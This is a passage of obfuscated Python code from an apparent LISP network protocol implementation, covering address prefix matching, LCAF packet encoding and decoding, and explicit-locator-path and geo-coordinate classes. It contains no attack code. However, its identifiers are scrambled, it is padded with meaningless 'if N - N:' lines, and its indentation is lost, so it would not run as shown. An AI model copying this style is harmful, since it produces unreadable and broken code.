if ( self . is_ultimate_root ( ) ) : return ( "0--0" )
o0o00O0oOooO0 = self . print_address ( )
ooo = o0o00O0oOooO0 . find ( "]" )
if ( ooo != - 1 ) : o0o00O0oOooO0 = o0o00O0oOooO0 [ ooo + 1 : : ]
if ( self . is_geo_prefix ( ) ) :
o0o00O0oOooO0 = o0o00O0oOooO0 . replace ( "/" , "-" )
return ( "{}-{}" . format ( self . instance_id , o0o00O0oOooO0 ) )
if 59 - 59: I1IiiI
return ( "{}-{}-{}" . format ( self . instance_id , o0o00O0oOooO0 , self . mask_len ) )
if 65 - 65: OoooooooOO - I11i
if 38 - 38: i1IIi + oO0o * ooOoO0o % Ii1I % ooOoO0o
def print_sg ( self , g ) :
OO0o0OO0 = self . print_prefix ( )
OO0O00O = OO0o0OO0 . find ( "]" ) + 1
g = g . print_prefix ( )
I11I = g . find ( "]" ) + 1
iii1IIiI = "[{}]({}, {})" . format ( self . instance_id , OO0o0OO0 [ OO0O00O : : ] , g [ I11I : : ] )
return ( iii1IIiI )
if 60 - 60: I1Ii111
if 35 - 35: iIii1I11I1II1 . O0 + I1ii11iIi11i + OoO0O00
def hash_address ( self , addr ) :
ooOo0O0 = self . address
ooo0 = addr . address
if 33 - 33: I11i - iIii1I11I1II1 . iIii1I11I1II1 . Ii1I . OoO0O00
if ( self . is_geo_prefix ( ) ) : ooOo0O0 = self . address . print_geo ( )
if ( addr . is_geo_prefix ( ) ) : ooo0 = addr . address . print_geo ( )
if 21 - 21: Oo0Ooo - i11iIiiIii * oO0o + IiII + o0oOOo0O0Ooo + iII111i
if ( type ( ooOo0O0 ) == str ) :
ooOo0O0 = int ( binascii . hexlify ( ooOo0O0 [ 0 : 1 ] ) )
if 21 - 21: OoooooooOO + II111iiii - OoOoOO00 . i11iIiiIii * OOooOOo
if ( type ( ooo0 ) == str ) :
ooo0 = int ( binascii . hexlify ( ooo0 [ 0 : 1 ] ) )
if 99 - 99: i1IIi . iIii1I11I1II1 % O0 - IiII . i11iIiiIii % iII111i
return ( ooOo0O0 ^ ooo0 )
if 87 - 87: i11iIiiIii % o0oOOo0O0Ooo + Ii1I
if 72 - 72: Ii1I / II111iiii + o0oOOo0O0Ooo
if 33 - 33: I1Ii111 * OoOoOO00 - OoooooooOO
if 11 - 11: I1Ii111 - Oo0Ooo / iIii1I11I1II1 - OoooooooOO
if 71 - 71: Oo0Ooo + Ii1I - OoooooooOO + I11i - iIii1I11I1II1 / O0
if 76 - 76: i11iIiiIii % o0oOOo0O0Ooo . O0 * I11i
def is_more_specific ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( True )
if 90 - 90: II111iiii + OOooOOo % I1Ii111 * iIii1I11I1II1 % iIii1I11I1II1
oO00OO0Ooo00O = prefix . mask_len
if ( prefix . afi == LISP_AFI_IID_RANGE ) :
Oo0oOo0o0O = 2 ** ( 32 - oO00OO0Ooo00O )
iII1iiI = prefix . instance_id
O00ooOOoO0o0o = iII1iiI + Oo0oOo0o0O
return ( self . instance_id in range ( iII1iiI , O00ooOOoO0o0o ) )
if 11 - 11: i11iIiiIii % Oo0Ooo / ooOoO0o
if 70 - 70: ooOoO0o
if ( self . instance_id != prefix . instance_id ) : return ( False )
if ( self . afi != prefix . afi ) :
if ( prefix . afi != LISP_AFI_NONE ) : return ( False )
if 45 - 45: iII111i * OoooooooOO % ooOoO0o
if 5 - 5: II111iiii
if 18 - 18: O0 * ooOoO0o
if 32 - 32: OoooooooOO - ooOoO0o % O0 + oO0o - OoooooooOO - O0
if 7 - 7: ooOoO0o
if ( self . is_binary ( ) == False ) :
if ( prefix . afi == LISP_AFI_NONE ) : return ( True )
if ( type ( self . address ) != type ( prefix . address ) ) : return ( False )
o0o00O0oOooO0 = self . address
I1Oo0O = prefix . address
if ( self . is_geo_prefix ( ) ) :
o0o00O0oOooO0 = self . address . print_geo ( )
I1Oo0O = prefix . address . print_geo ( )
if 26 - 26: ooOoO0o
if ( len ( o0o00O0oOooO0 ) < len ( I1Oo0O ) ) : return ( False )
return ( o0o00O0oOooO0 . find ( I1Oo0O ) == 0 )
if 70 - 70: Ii1I
if 50 - 50: ooOoO0o % O0 . iIii1I11I1II1 - Ii1I * Oo0Ooo
if 5 - 5: i11iIiiIii - I1ii11iIi11i
if 83 - 83: OoO0O00 - i11iIiiIii + I1ii11iIi11i - OOooOOo / OoOoOO00 / I11i
if 53 - 53: I11i * I1IiiI . I1IiiI / o0oOOo0O0Ooo - I1Ii111
if ( self . mask_len < oO00OO0Ooo00O ) : return ( False )
if 50 - 50: I11i - OoOoOO00 + I1IiiI % Oo0Ooo / OoooooooOO - I1ii11iIi11i
IiII1II1IiI1i1II = ( prefix . addr_length ( ) * 8 ) - oO00OO0Ooo00O
iIi1ii = ( 2 ** oO00OO0Ooo00O - 1 ) << IiII1II1IiI1i1II
return ( ( self . address & iIi1ii ) == prefix . address )
if 26 - 26: IiII . Ii1I
if 35 - 35: I1ii11iIi11i + OOooOOo
def mask_address ( self , mask_len ) :
IiII1II1IiI1i1II = ( self . addr_length ( ) * 8 ) - mask_len
iIi1ii = ( 2 ** mask_len - 1 ) << IiII1II1IiI1i1II
self . address &= iIi1ii
if 88 - 88: O0
if 4 - 4: OoOoOO00 % iIii1I11I1II1 % OoooooooOO . oO0o
def is_exact_match ( self , prefix ) :
if ( self . instance_id != prefix . instance_id ) : return ( False )
iiI11II1 = self . print_prefix ( )
Ii1iiiIi1ii1 = prefix . print_prefix ( ) if prefix else ""
return ( iiI11II1 == Ii1iiiIi1ii1 )
if 48 - 48: O0 % i1IIi
if 54 - 54: OOooOOo % Ii1I . i1IIi
def is_local ( self ) :
if ( self . is_ipv4 ( ) ) :
o0OoOO = lisp_myrlocs [ 0 ]
if ( o0OoOO == None ) : return ( False )
o0OoOO = o0OoOO . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == o0OoOO )
if 12 - 12: ooOoO0o / iII111i
if ( self . is_ipv6 ( ) ) :
o0OoOO = lisp_myrlocs [ 1 ]
if ( o0OoOO == None ) : return ( False )
o0OoOO = o0OoOO . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == o0OoOO )
if 80 - 80: i1IIi * ooOoO0o * OoOoOO00
return ( False )
if 3 - 3: i1IIi - Oo0Ooo + OoOoOO00 . I1Ii111 * iII111i - O0
if 66 - 66: o0oOOo0O0Ooo * I1Ii111 . O0 - iII111i
def store_iid_range ( self , iid , mask_len ) :
if ( self . afi == LISP_AFI_NONE ) :
if ( iid == 0 and mask_len == 0 ) : self . afi = LISP_AFI_ULTIMATE_ROOT
else : self . afi = LISP_AFI_IID_RANGE
if 22 - 22: OoO0O00 / I1IiiI - I1IiiI - i11iIiiIii . I1IiiI - OOooOOo
self . instance_id = iid
self . mask_len = mask_len
if 27 - 27: ooOoO0o
if 34 - 34: OoooooooOO - I1Ii111 + I1Ii111 % IiII % OoooooooOO
def lcaf_length ( self , lcaf_type ) :
oOOoO0O = self . addr_length ( ) + 2
if ( lcaf_type == LISP_LCAF_AFI_LIST_TYPE ) : oOOoO0O += 4
if ( lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE ) : oOOoO0O += 4
if ( lcaf_type == LISP_LCAF_ASN_TYPE ) : oOOoO0O += 4
if ( lcaf_type == LISP_LCAF_APP_DATA_TYPE ) : oOOoO0O += 8
if ( lcaf_type == LISP_LCAF_GEO_COORD_TYPE ) : oOOoO0O += 12
if ( lcaf_type == LISP_LCAF_OPAQUE_TYPE ) : oOOoO0O += 0
if ( lcaf_type == LISP_LCAF_NAT_TYPE ) : oOOoO0O += 4
if ( lcaf_type == LISP_LCAF_NONCE_LOC_TYPE ) : oOOoO0O += 4
if ( lcaf_type == LISP_LCAF_MCAST_INFO_TYPE ) : oOOoO0O = oOOoO0O * 2 + 8
if ( lcaf_type == LISP_LCAF_ELP_TYPE ) : oOOoO0O += 0
if ( lcaf_type == LISP_LCAF_SECURITY_TYPE ) : oOOoO0O += 6
if ( lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE ) : oOOoO0O += 4
if ( lcaf_type == LISP_LCAF_RLE_TYPE ) : oOOoO0O += 4
return ( oOOoO0O )
if 24 - 24: I1Ii111 . Oo0Ooo / ooOoO0o * O0
if 85 - 85: I1IiiI - OOooOOo
if 7 - 7: i1IIi % II111iiii
if 33 - 33: iIii1I11I1II1 . O0 . oO0o
if 69 - 69: II111iiii * O0 . ooOoO0o * IiII
if 25 - 25: I11i - I1ii11iIi11i . I1Ii111 . OoooooooOO
if 4 - 4: IiII * OoO0O00 % I1ii11iIi11i * Ii1I . iII111i
if 41 - 41: OoooooooOO % I11i . O0 + I1Ii111
if 67 - 67: OoOoOO00 * OOooOOo / OOooOOo / OoooooooOO
if 67 - 67: I11i - i1IIi . OoooooooOO / iIii1I11I1II1
if 34 - 34: OoO0O00 * II111iiii
if 43 - 43: OoOoOO00 . I1IiiI
if 44 - 44: O0 / o0oOOo0O0Ooo
if 19 - 19: I11i
if 91 - 91: OOooOOo * OoooooooOO
if 89 - 89: i1IIi / iII111i . I1Ii111
if 74 - 74: I1ii11iIi11i % iII111i / OoooooooOO / I1ii11iIi11i % i11iIiiIii % ooOoO0o
def lcaf_encode_iid ( self ) :
OOOoooO000O0 = LISP_LCAF_INSTANCE_ID_TYPE
IiIi11 = socket . htons ( self . lcaf_length ( OOOoooO000O0 ) )
IiIIi11i111 = self . instance_id
IiiiII = self . afi
iiIi = 0
if ( IiiiII < 0 ) :
if ( self . afi == LISP_AFI_GEO_COORD ) :
IiiiII = LISP_AFI_LCAF
iiIi = 0
else :
IiiiII = 0
iiIi = self . mask_len
if 82 - 82: OoooooooOO . o0oOOo0O0Ooo * I1ii11iIi11i % I1ii11iIi11i * Ii1I
if 83 - 83: I11i - Oo0Ooo + i11iIiiIii - i11iIiiIii
if 64 - 64: IiII % I1IiiI / ooOoO0o
oo0o = struct . pack ( "BBBBH" , 0 , 0 , OOOoooO000O0 , iiIi , IiIi11 )
oo0o += struct . pack ( "IH" , socket . htonl ( IiIIi11i111 ) , socket . htons ( IiiiII ) )
if ( IiiiII == 0 ) : return ( oo0o )
if 26 - 26: iII111i . i1IIi * OoOoOO00 + I1Ii111 . IiII % i11iIiiIii
if ( self . afi == LISP_AFI_GEO_COORD ) :
oo0o = oo0o [ 0 : - 2 ]
oo0o += self . address . encode_geo ( )
return ( oo0o )
if 98 - 98: I1IiiI - oO0o / i11iIiiIii % I1ii11iIi11i * oO0o * OoO0O00
if 74 - 74: I1Ii111 . I1ii11iIi11i - Ii1I * i11iIiiIii
oo0o += self . pack_address ( )
return ( oo0o )
if 36 - 36: II111iiii * Ii1I
if 53 - 53: Ii1I / iIii1I11I1II1 + o0oOOo0O0Ooo . Ii1I
def lcaf_decode_iid ( self , packet ) :
O0O00Oo = "BBBBH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 79 - 79: Ii1I % O0 * OOooOOo
oOo0oo , IIIi1i1iIIIi , OOOoooO000O0 , II1IIII1iII , oOOoO0O = struct . unpack ( O0O00Oo ,
packet [ : IiIii1i ] )
packet = packet [ IiIii1i : : ]
if 24 - 24: oO0o
if ( OOOoooO000O0 != LISP_LCAF_INSTANCE_ID_TYPE ) : return ( None )
if 98 - 98: oO0o + iIii1I11I1II1 . ooOoO0o / I1ii11iIi11i
O0O00Oo = "IH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 77 - 77: OoOoOO00 / Oo0Ooo * OoOoOO00 % I1IiiI . II111iiii % OoO0O00
IiIIi11i111 , IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
packet = packet [ IiIii1i : : ]
if 38 - 38: iII111i - OoO0O00 / i1IIi + ooOoO0o . ooOoO0o . iII111i
oOOoO0O = socket . ntohs ( oOOoO0O )
self . instance_id = socket . ntohl ( IiIIi11i111 )
IiiiII = socket . ntohs ( IiiiII )
self . afi = IiiiII
if ( II1IIII1iII != 0 and IiiiII == 0 ) : self . mask_len = II1IIII1iII
if ( IiiiII == 0 ) :
self . afi = LISP_AFI_IID_RANGE if II1IIII1iII else LISP_AFI_ULTIMATE_ROOT
if 37 - 37: iIii1I11I1II1 * OoOoOO00 . OoOoOO00 + OoooooooOO + OoO0O00
if 25 - 25: I1IiiI / IiII . OOooOOo . I1ii11iIi11i % i1IIi
if 12 - 12: O0 % O0
if 9 - 9: O0 . I1IiiI + I1ii11iIi11i / OOooOOo * I1ii11iIi11i
if 10 - 10: IiII % o0oOOo0O0Ooo / O0 / II111iiii
if ( IiiiII == 0 ) : return ( packet )
if 81 - 81: Ii1I / o0oOOo0O0Ooo % OoOoOO00 . I1ii11iIi11i
if 47 - 47: II111iiii + OOooOOo / II111iiii . OOooOOo
if 68 - 68: OoooooooOO
if 63 - 63: I1IiiI
if ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
return ( packet )
if 80 - 80: oO0o + iIii1I11I1II1
if 87 - 87: I1ii11iIi11i % Ii1I . Ii1I
if 71 - 71: OoO0O00 - IiII . i1IIi * I1IiiI % I11i
if 36 - 36: IiII * OoooooooOO . i11iIiiIii * i1IIi
if 52 - 52: IiII + ooOoO0o - II111iiii - OoooooooOO * OoO0O00 - iIii1I11I1II1
if ( IiiiII == LISP_AFI_LCAF ) :
O0O00Oo = "BBBBH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 38 - 38: II111iiii % iIii1I11I1II1 * IiII * OoOoOO00 % II111iiii . I1IiiI
iI1i , O0OooO00O0 , OOOoooO000O0 , iiI1i111I1 , iII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 35 - 35: OoooooooOO - i11iIiiIii * i11iIiiIii % Ii1I - OOooOOo . iIii1I11I1II1
if 96 - 96: OOooOOo
if ( OOOoooO000O0 != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 18 - 18: oO0o . I1ii11iIi11i % oO0o
iII = socket . ntohs ( iII )
packet = packet [ IiIii1i : : ]
if ( iII > len ( packet ) ) : return ( None )
if 43 - 43: oO0o / ooOoO0o . o0oOOo0O0Ooo . iIii1I11I1II1
I1Ii1i111I = lisp_geo ( "" )
self . afi = LISP_AFI_GEO_COORD
self . address = I1Ii1i111I
packet = I1Ii1i111I . decode_geo ( packet , iII , iiI1i111I1 )
self . mask_len = self . host_mask_len ( )
return ( packet )
if 63 - 63: iII111i * iII111i
if 78 - 78: iIii1I11I1II1 % iIii1I11I1II1 . iIii1I11I1II1 / Ii1I . O0 + i1IIi
IiIi11 = self . addr_length ( )
if ( len ( packet ) < IiIi11 ) : return ( None )
if 53 - 53: Ii1I . I1ii11iIi11i - OOooOOo - ooOoO0o
packet = self . unpack_address ( packet )
return ( packet )
if 17 - 17: OoooooooOO / I1IiiI * ooOoO0o % I1ii11iIi11i . OoO0O00
if 5 - 5: OoO0O00 % I1Ii111 . oO0o . Ii1I + I1IiiI
if 95 - 95: II111iiii . iII111i - iIii1I11I1II1 / I11i + ooOoO0o * I1Ii111
if 92 - 92: iII111i * OoooooooOO % I1IiiI / OOooOOo
if 46 - 46: OoOoOO00
if 52 - 52: o0oOOo0O0Ooo - OoO0O00 % i1IIi / Ii1I % IiII
if 100 - 100: oO0o . i11iIiiIii - ooOoO0o
if 49 - 49: Oo0Ooo % ooOoO0o % o0oOOo0O0Ooo + ooOoO0o * I1Ii111 % I1IiiI
if 85 - 85: i1IIi / i1IIi
if 77 - 77: i1IIi . ooOoO0o % ooOoO0o - Ii1I
if 6 - 6: OOooOOo % Ii1I + ooOoO0o
if 17 - 17: iIii1I11I1II1 * I1Ii111 % oO0o + o0oOOo0O0Ooo . Ii1I * Oo0Ooo
if 16 - 16: I1IiiI % OoO0O00 . ooOoO0o / OoooooooOO
if 8 - 8: I1Ii111 % OoO0O00 . I1IiiI - OoOoOO00 + i1IIi / iIii1I11I1II1
if 89 - 89: II111iiii / Ii1I % Ii1I
if 57 - 57: I11i
if 95 - 95: OoOoOO00 + I11i * i1IIi - ooOoO0o % ooOoO0o
if 58 - 58: OOooOOo
if 74 - 74: i1IIi . IiII / ooOoO0o + I11i % i11iIiiIii % iII111i
if 62 - 62: i1IIi % I1Ii111
if 94 - 94: i1IIi + iII111i
def lcaf_encode_sg ( self , group ) :
OOOoooO000O0 = LISP_LCAF_MCAST_INFO_TYPE
IiIIi11i111 = socket . htonl ( self . instance_id )
IiIi11 = socket . htons ( self . lcaf_length ( OOOoooO000O0 ) )
oo0o = struct . pack ( "BBBBHIHBB" , 0 , 0 , OOOoooO000O0 , 0 , IiIi11 , IiIIi11i111 ,
0 , self . mask_len , group . mask_len )
if 25 - 25: I1Ii111 . Ii1I - Ii1I . o0oOOo0O0Ooo - IiII
oo0o += struct . pack ( "H" , socket . htons ( self . afi ) )
oo0o += self . pack_address ( )
oo0o += struct . pack ( "H" , socket . htons ( group . afi ) )
oo0o += group . pack_address ( )
return ( oo0o )
if 91 - 91: o0oOOo0O0Ooo % I1ii11iIi11i % OoOoOO00 * iIii1I11I1II1
if 18 - 18: OoOoOO00 * I1ii11iIi11i . i1IIi * iII111i
def lcaf_decode_sg ( self , packet ) :
O0O00Oo = "BBBBHIHBB"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( [ None , None ] )
if 67 - 67: IiII + i11iIiiIii . II111iiii / OoOoOO00 + OoooooooOO + i11iIiiIii
oOo0oo , IIIi1i1iIIIi , OOOoooO000O0 , iI111iiI1II , oOOoO0O , IiIIi11i111 , iiIiIi , O000oooOoooo0 , iiiIiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 31 - 31: OoooooooOO . I1Ii111 % OoooooooOO * iII111i % OOooOOo . iII111i
packet = packet [ IiIii1i : : ]
if 17 - 17: I1Ii111 % i1IIi % I11i * O0 / Oo0Ooo
if ( OOOoooO000O0 != LISP_LCAF_MCAST_INFO_TYPE ) : return ( [ None , None ] )
if 96 - 96: OoOoOO00 . Ii1I
self . instance_id = socket . ntohl ( IiIIi11i111 )
oOOoO0O = socket . ntohs ( oOOoO0O ) - 8
if 80 - 80: OoOoOO00 + o0oOOo0O0Ooo - II111iiii
if 3 - 3: ooOoO0o * I1Ii111
if 34 - 34: Ii1I / Oo0Ooo . II111iiii - ooOoO0o - I1ii11iIi11i % OoOoOO00
if 43 - 43: Ii1I * oO0o
if 57 - 57: OoooooooOO + I1IiiI % I1ii11iIi11i % ooOoO0o * I1Ii111
O0O00Oo = "H"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( [ None , None ] )
if ( oOOoO0O < IiIii1i ) : return ( [ None , None ] )
if 9 - 9: i11iIiiIii
IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
oOOoO0O -= IiIii1i
self . afi = socket . ntohs ( IiiiII )
self . mask_len = O000oooOoooo0
IiIi11 = self . addr_length ( )
if ( oOOoO0O < IiIi11 ) : return ( [ None , None ] )
if 85 - 85: IiII / o0oOOo0O0Ooo * ooOoO0o
packet = self . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 74 - 74: O0 - o0oOOo0O0Ooo
oOOoO0O -= IiIi11
if 68 - 68: I1Ii111
if 19 - 19: o0oOOo0O0Ooo
if 63 - 63: OoooooooOO % ooOoO0o
if 26 - 26: OOooOOo + Oo0Ooo
if 97 - 97: I1Ii111 * I1Ii111 + iII111i % Ii1I / iII111i
O0O00Oo = "H"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( [ None , None ] )
if ( oOOoO0O < IiIii1i ) : return ( [ None , None ] )
if 73 - 73: OoOoOO00 % I1Ii111 . I1ii11iIi11i
IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
oOOoO0O -= IiIii1i
OOo0oOOO0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
OOo0oOOO0 . afi = socket . ntohs ( IiiiII )
OOo0oOOO0 . mask_len = iiiIiII
OOo0oOOO0 . instance_id = self . instance_id
IiIi11 = self . addr_length ( )
if ( oOOoO0O < IiIi11 ) : return ( [ None , None ] )
if 45 - 45: iIii1I11I1II1 % Ii1I . OoOoOO00 . o0oOOo0O0Ooo - OoooooooOO
packet = OOo0oOOO0 . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 46 - 46: I1ii11iIi11i
return ( [ packet , OOo0oOOO0 ] )
if 32 - 32: iII111i * i11iIiiIii / IiII + i11iIiiIii + O0
if 51 - 51: I1Ii111
def lcaf_decode_eid ( self , packet ) :
O0O00Oo = "BBB"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( [ None , None ] )
if 95 - 95: Ii1I / Ii1I * OoO0O00 . OoooooooOO . OoooooooOO * I11i
if 76 - 76: OoooooooOO - Ii1I + IiII % OoOoOO00 / OoooooooOO
if 55 - 55: i11iIiiIii - IiII * OOooOOo + II111iiii . I1ii11iIi11i / O0
if 16 - 16: II111iiii . Oo0Ooo * I1Ii111 + o0oOOo0O0Ooo - i11iIiiIii
if 98 - 98: II111iiii - i1IIi - ooOoO0o
iI111iiI1II , O0OooO00O0 , OOOoooO000O0 = struct . unpack ( O0O00Oo ,
packet [ : IiIii1i ] )
if 36 - 36: IiII + o0oOOo0O0Ooo
if ( OOOoooO000O0 == LISP_LCAF_INSTANCE_ID_TYPE ) :
return ( [ self . lcaf_decode_iid ( packet ) , None ] )
elif ( OOOoooO000O0 == LISP_LCAF_MCAST_INFO_TYPE ) :
packet , OOo0oOOO0 = self . lcaf_decode_sg ( packet )
return ( [ packet , OOo0oOOO0 ] )
elif ( OOOoooO000O0 == LISP_LCAF_GEO_COORD_TYPE ) :
O0O00Oo = "BBBBH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 81 - 81: OOooOOo / I11i % oO0o + ooOoO0o
iI1i , O0OooO00O0 , OOOoooO000O0 , iiI1i111I1 , iII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 10 - 10: oO0o / i11iIiiIii
if 73 - 73: OoO0O00 - i1IIi
if ( OOOoooO000O0 != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 52 - 52: I1ii11iIi11i
iII = socket . ntohs ( iII )
packet = packet [ IiIii1i : : ]
if ( iII > len ( packet ) ) : return ( None )
if 4 - 4: Ii1I - iII111i + i1IIi - I1Ii111 / iII111i . Oo0Ooo
I1Ii1i111I = lisp_geo ( "" )
self . instance_id = 0
self . afi = LISP_AFI_GEO_COORD
self . address = I1Ii1i111I
packet = I1Ii1i111I . decode_geo ( packet , iII , iiI1i111I1 )
self . mask_len = self . host_mask_len ( )
if 18 - 18: oO0o % iIii1I11I1II1 + ooOoO0o
return ( [ packet , None ] )
if 34 - 34: I1IiiI - OoooooooOO . IiII - OOooOOo % IiII
if 19 - 19: IiII + I1ii11iIi11i % Oo0Ooo
if 32 - 32: OOooOOo
if 46 - 46: II111iiii . OoO0O00
if 97 - 97: oO0o
if 45 - 45: i11iIiiIii / IiII + OoO0O00
class lisp_elp_node ( ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . probe = False
self . strict = False
self . eid = False
self . we_are_last = False
if 55 - 55: Ii1I / II111iiii - oO0o
if 58 - 58: i1IIi . OoooooooOO % iIii1I11I1II1 * o0oOOo0O0Ooo + O0 / oO0o
def copy_elp_node ( self ) :
IIii = lisp_elp_node ( )
IIii . copy_address ( self . address )
IIii . probe = self . probe
IIii . strict = self . strict
IIii . eid = self . eid
IIii . we_are_last = self . we_are_last
return ( IIii )
if 77 - 77: I11i . I1ii11iIi11i
if 92 - 92: i11iIiiIii + I11i % I1IiiI / ooOoO0o
if 28 - 28: i1IIi . I1IiiI
class lisp_elp ( ) :
def __init__ ( self , name ) :
self . elp_name = name
self . elp_nodes = [ ]
self . use_elp_node = None
self . we_are_last = False
if 41 - 41: I1ii11iIi11i . I1Ii111 * OoOoOO00 . I1Ii111 / o0oOOo0O0Ooo
if 41 - 41: o0oOOo0O0Ooo / o0oOOo0O0Ooo . Oo0Ooo
def copy_elp ( self ) :
O0OoO0O0O0oO = lisp_elp ( self . elp_name )
O0OoO0O0O0oO . use_elp_node = self . use_elp_node
O0OoO0O0O0oO . we_are_last = self . we_are_last
for IIii in self . elp_nodes :
O0OoO0O0O0oO . elp_nodes . append ( IIii . copy_elp_node ( ) )
if 4 - 4: I1Ii111
return ( O0OoO0O0O0oO )
if 85 - 85: iIii1I11I1II1 % Oo0Ooo
if 20 - 20: IiII + i11iIiiIii * OOooOOo
def print_elp ( self , want_marker ) :
OoOiIIiI = ""
for IIii in self . elp_nodes :
ii1III1IiIII1 = ""
if ( want_marker ) :
if ( IIii == self . use_elp_node ) :
ii1III1IiIII1 = "*"
elif ( IIii . we_are_last ) :
ii1III1IiIII1 = "x"
if 51 - 51: I1ii11iIi11i * OOooOOo
if 100 - 100: OoO0O00 * oO0o + I1IiiI - o0oOOo0O0Ooo . o0oOOo0O0Ooo % OoO0O00
OoOiIIiI += "{}{}({}{}{}), " . format ( ii1III1IiIII1 ,
IIii . address . print_address_no_iid ( ) ,
"r" if IIii . eid else "R" , "P" if IIii . probe else "p" ,
"S" if IIii . strict else "s" )
if 65 - 65: OoooooooOO / OoOoOO00 + I1IiiI - II111iiii / OoOoOO00
return ( OoOiIIiI [ 0 : - 2 ] if OoOiIIiI != "" else "" )
if 69 - 69: i11iIiiIii
if 77 - 77: I1ii11iIi11i % OoooooooOO - Oo0Ooo - Ii1I + I11i
def select_elp_node ( self ) :
Oo0o0OoO00 , II1III , OoO0o0OOOO = lisp_myrlocs
ooo = None
if 83 - 83: ooOoO0o
for IIii in self . elp_nodes :
if ( Oo0o0OoO00 and IIii . address . is_exact_match ( Oo0o0OoO00 ) ) :
ooo = self . elp_nodes . index ( IIii )
break
if 59 - 59: I1ii11iIi11i
if ( II1III and IIii . address . is_exact_match ( II1III ) ) :
ooo = self . elp_nodes . index ( IIii )
break
if 26 - 26: I11i . Ii1I
if 94 - 94: ooOoO0o . I1IiiI + IiII % I1IiiI / o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 21 - 21: O0 / OOooOOo - II111iiii + I1ii11iIi11i / OoooooooOO
if 81 - 81: i11iIiiIii / Oo0Ooo * i1IIi + OoO0O00 + O0 % I1ii11iIi11i
if 3 - 3: i11iIiiIii * IiII . Oo0Ooo % OoOoOO00 * I11i . iII111i
if 80 - 80: I11i - IiII
if 40 - 40: OOooOOo * I1IiiI % I11i . I1Ii111 % O0 . O0
if ( ooo == None ) :
self . use_elp_node = self . elp_nodes [ 0 ]
IIii . we_are_last = False
return
if 14 - 14: ooOoO0o . OoOoOO00 + ooOoO0o * OoOoOO00 . OoOoOO00 * Oo0Ooo
if 40 - 40: OoooooooOO
if 14 - 14: o0oOOo0O0Ooo / OOooOOo . OoOoOO00 % iIii1I11I1II1 % OoOoOO00
if 92 - 92: o0oOOo0O0Ooo + II111iiii
if 56 - 56: OoOoOO00 - OoOoOO00 / Ii1I
if 92 - 92: iIii1I11I1II1
if ( self . elp_nodes [ - 1 ] == self . elp_nodes [ ooo ] ) :
self . use_elp_node = None
IIii . we_are_last = True
return
if 21 - 21: I1IiiI
if 69 - 69: OoooooooOO + iII111i
if 29 - 29: ooOoO0o * I1IiiI / Oo0Ooo / I1ii11iIi11i
if 74 - 74: I1ii11iIi11i - ooOoO0o / OoOoOO00 - OoooooooOO * oO0o
if 45 - 45: o0oOOo0O0Ooo . I1Ii111 % Ii1I
self . use_elp_node = self . elp_nodes [ ooo + 1 ]
return
if 42 - 42: Oo0Ooo + i11iIiiIii - OOooOOo . I1ii11iIi11i % I1Ii111 . I1ii11iIi11i
if 59 - 59: OoooooooOO
if 91 - 91: i11iIiiIii / Oo0Ooo % I11i / O0
class lisp_geo ( ) :
def __init__ ( self , name ) :
self . geo_name = name
self . latitude = 0xffffffff
self . lat_mins = 0
self . lat_secs = 0
self . longitude = 0xffffffff
self . long_mins = 0
self . long_secs = 0
self . altitude = - 1
self . radius = 0
if 80 - 80: II111iiii / I1ii11iIi11i % I1IiiI . Ii1I
if 8 - 8: oO0o
def copy_geo ( self ) :
I1Ii1i111I = lisp_geo ( self . geo_name )
I1Ii1i111I . latitude = self . latitude
I1Ii1i111I . lat_mins = self . lat_mins
I1Ii1i111I . lat_secs = self . lat_secs
I1Ii1i111I . longitude = self . longitude
I1Ii1i111I . long_mins = self . long_mins
I1Ii1i111I . long_secs = self . long_secs
I1Ii1i111I . altitude = self . altitude
I1Ii1i111I . radius = self . radius
return ( I1Ii1i111I )
if 21 - 21: oO0o + iII111i . i11iIiiIii - II111iiii
if 14 - 14: I1Ii111
def no_geo_altitude ( self ) :
return ( self . altitude == - 1 )
if 81 - 81: II111iiii
if 55 - 55: O0 + o0oOOo0O0Ooo * I1IiiI - OoooooooOO
def parse_geo_string ( self , geo_str ) :
ooo = geo_str . find ( "]" )
if ( ooo != - 1 ) : geo_str = geo_str [ ooo + 1 : : ]
if 68 - 68: I11i + Oo0Ooo
if 15 - 15: O0
if 75 - 75: iII111i / OoOoOO00
if 2 - 2: i1IIi + oO0o % iII111i % I1ii11iIi11i + ooOoO0o . iII111i
if 26 - 26: I11i + o0oOOo0O0Ooo + Ii1I % I11i
if ( geo_str . find ( "/" ) != - 1 ) :
